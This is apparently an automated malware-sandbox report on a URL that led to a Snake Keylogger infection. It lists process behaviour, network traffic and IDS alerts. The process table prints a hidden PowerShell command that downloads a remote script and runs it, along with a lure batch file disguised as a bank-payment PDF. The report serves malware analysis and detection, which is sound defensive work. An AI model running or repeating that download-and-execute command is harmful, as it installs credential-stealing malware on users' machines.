| URL: | qvcit.egain.cloud/system/ws/internal/stream/activity/6A4C5269595A38626C6E3444745333745731494D3264396B62782B5A363763764566634758734F41674976556B2B517356624F36746E3137694B61663249665038644C4D55764A57744A4C4C0D0A4D755239346D67414A4C596A4D6F6F5178746C614F783156516533652B5441595279496368596B7A754B336F6141687153304F7565696D745A657651653175746B58725855716936365858790D0A774E50327331424B513148682B6463796A756347776B5972755A4733594349726447464D68437544473936583152702F56346866553932693761386E67413D3D |
| Full analysis: | https://app.any.run/tasks/e1127bab-c5e6-4958-876e-649b688be9db |
| Verdict: | Malicious activity |
| Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
| Analysis date: | May 19, 2025, 12:32:16 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MD5: | 45F4992FA74A0ED6F7C47150A4AFFFC8 |
| SHA1: | 573254C25D03845ADB5013D43E8DFB76BC0F8571 |
| SHA256: | D7CEDD7B4CC774B29DC475E90E7969BB35DE7E46D781FBAE2AF72C8924675B92 |
| SSDEEP: | 12:cEb4if6d34bMlykuRY5GqpZ3vW7vmIQoiRpXsk0+i3:1bbf6dqkeYQq7OrDQTI1v |
MALICIOUS
SNAKEKEYLOGGER has been detected (SURICATA)
- PING.EXE (PID: 8412)
Steals credentials from Web Browsers
- PING.EXE (PID: 8164)
- PING.EXE (PID: 8412)
Actions looks like stealing of personal data
- PING.EXE (PID: 8412)
- PING.EXE (PID: 8164)
SUSPICIOUS
Possibly malicious use of IEX has been detected
- cmd.exe (PID: 8440)
- cmd.exe (PID: 4120)
The process executes Powershell scripts
- cmd.exe (PID: 8440)
- cmd.exe (PID: 4120)
Starts CMD.EXE for commands execution
- WinRAR.exe (PID: 8904)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 8904)
Executing commands from a ".bat" file
- WinRAR.exe (PID: 8904)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 8440)
- cmd.exe (PID: 4120)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 5720)
- powershell.exe (PID: 5988)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 5720)
- powershell.exe (PID: 5988)
Executable content was dropped or overwritten
- powershell.exe (PID: 5988)
Start notepad (likely ransomware note)
- WinRAR.exe (PID: 8904)
Starts the AutoIt3 executable file
- powershell.exe (PID: 5988)
- powershell.exe (PID: 5720)
Checks for external IP
- PING.EXE (PID: 8412)
- svchost.exe (PID: 2196)
- PING.EXE (PID: 8164)
The process verifies whether the antivirus software is installed
- PING.EXE (PID: 8164)
INFO
Checks supported languages
- identity_helper.exe (PID: 8596)
- FOFjlKvgjqwziW.exe (PID: 8752)
- FOFjlKvgjqwziW.exe (PID: 7292)
Reads Microsoft Office registry keys
- msedge.exe (PID: 6108)
- WinRAR.exe (PID: 8904)
Application launched itself
- msedge.exe (PID: 6108)
Reads Environment values
- identity_helper.exe (PID: 8596)
Reads the computer name
- identity_helper.exe (PID: 8596)
Checks proxy server information
- powershell.exe (PID: 5720)
- PING.EXE (PID: 8412)
- PING.EXE (PID: 8164)
Disables trace logs
- powershell.exe (PID: 5720)
- PING.EXE (PID: 8164)
The sample compiled with english language support
- powershell.exe (PID: 5988)
Reads mouse settings
- FOFjlKvgjqwziW.exe (PID: 8752)
The executable file from the user directory is run by the Powershell process
- FOFjlKvgjqwziW.exe (PID: 8752)
- FOFjlKvgjqwziW.exe (PID: 7292)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 5720)
Reads the software policy settings
- PING.EXE (PID: 8164)
- PING.EXE (PID: 8412)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
179
Monitored processes
47
Malicious processes
7
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1052 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2772 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5448 --field-trial-handle=2572,i,7713774391500321218,17758509086031908718,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 122.0.2365.59 Modules
| |||||||||||||||
| 3100 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4120 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa8904.27140\Bper Banca _Copia di Pagamento.pdf.bat" " | C:\Windows\System32\cmd.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4380 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5720 | powershell -w h iex(irm https://files.catbox.moe/r286xz.ps1) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5988 | powershell -w h iex(irm https://files.catbox.moe/r286xz.ps1) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6080 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5412 --field-trial-handle=2572,i,7713774391500321218,17758509086031908718,262144 --variations-seed-version /prefetch:8 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 122.0.2365.59 Modules
| |||||||||||||||
| 6108 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "qvcit.egain.cloud/system/ws/internal/stream/activity/6A4C5269595A38626C6E3444745333745731494D3264396B62782B5A363763764566634758734F41674976556B2B517356624F36746E3137694B61663249665038644C4D55764A57744A4C4C0D0A4D755239346D67414A4C596A4D6F6F5178746C614F783156516533652B5441595279496368596B7A754B336F6141687153304F7565696D745A657651653175746B58725855716936365858790D0A774E50327331424B513148682B6463796A756347776B5972755A4733594349726447464D68437544473936583152702F56346866553932693761386E67413D3D" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 122.0.2365.59 Modules
| |||||||||||||||
Total events
23 397
Read events
23 337
Write events
60
Delete events
0
Modification events
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon |
| Operation: | write | Name: | state |
Value: 1 | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics |
| Operation: | write | Name: | user_experience_metrics.stability.exited_cleanly |
Value: 0 | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault |
| Operation: | write | Name: | S-1-5-21-1693682860-607145093-2874071422-1001 |
Value: 15DF5A9B12942F00 | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault |
| Operation: | write | Name: | S-1-5-21-1693682860-607145093-2874071422-1001 |
Value: 3D1E659B12942F00 | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\262786 |
| Operation: | write | Name: | WindowTabManagerFileMappingId |
Value: {58478D83-0DB3-4552-9FF2-FD0076968AA8} | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault |
| Operation: | write | Name: | S-1-5-21-1693682860-607145093-2874071422-1001 |
Value: 385BA49B12942F00 | |||
| (PID) Process: | (8168) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
| Operation: | write | Name: | {2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF |
Value: 010000000000000090155E13BAC8DB01 | |||
| (PID) Process: | (6108) msedge.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A |
Value: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start | |||
Executable files
7
Suspicious files
63
Text files
34
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF10b884.TMP | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF10b884.TMP | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF10b8a3.TMP | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF10b8a3.TMP | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF10b8a3.TMP | — | |
MD5:— | SHA256:— | |||
| 6108 | msedge.exe | C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old | — | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
40
DNS requests
40
Threats
15
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
8552 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
8552 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
8164 | PING.EXE | GET | 200 | 132.226.8.169:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
8412 | PING.EXE | GET | 200 | 132.226.8.169:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
8412 | PING.EXE | GET | 200 | 132.226.8.169:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
8164 | PING.EXE | GET | 200 | 132.226.8.169:80 | http://checkip.dyndns.org/ | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5496 | MoUsoCoreWorker.exe | 23.216.77.6:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
6108 | msedge.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
7380 | msedge.exe | 13.107.43.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
7380 | msedge.exe | 150.171.27.11:443 | edge.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
7380 | msedge.exe | 13.107.6.158:443 | business.bing.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted |
7380 | msedge.exe | 34.248.221.18:443 | qvcit.egain.cloud | AMAZON-02 | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
edge.microsoft.com |
| whitelisted |
edge-mobile-static.azureedge.net |
| whitelisted |
qvcit.egain.cloud |
| whitelisted |
business.bing.com |
| whitelisted |
update.googleapis.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
5988 | powershell.exe | Potentially Bad Traffic | ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) |
5988 | powershell.exe | Not Suspicious Traffic | INFO [ANY.RUN] Downloading from a file sharing service is observed |
5720 | powershell.exe | Potentially Bad Traffic | ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI) |
5720 | powershell.exe | Not Suspicious Traffic | INFO [ANY.RUN] Downloading from a file sharing service is observed |
2196 | svchost.exe | Device Retrieving External IP Address Detected | ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org) |
8412 | PING.EXE | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |
8412 | PING.EXE | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |
8412 | PING.EXE | Device Retrieving External IP Address Detected | ET INFO 404/Snake/Matiex Keylogger Style External IP Check |
8412 | PING.EXE | Device Retrieving External IP Address Detected | ET INFO 404/Snake/Matiex Keylogger Style External IP Check |
8412 | PING.EXE | Device Retrieving External IP Address Detected | ET INFO External IP Lookup - checkip.dyndns.org |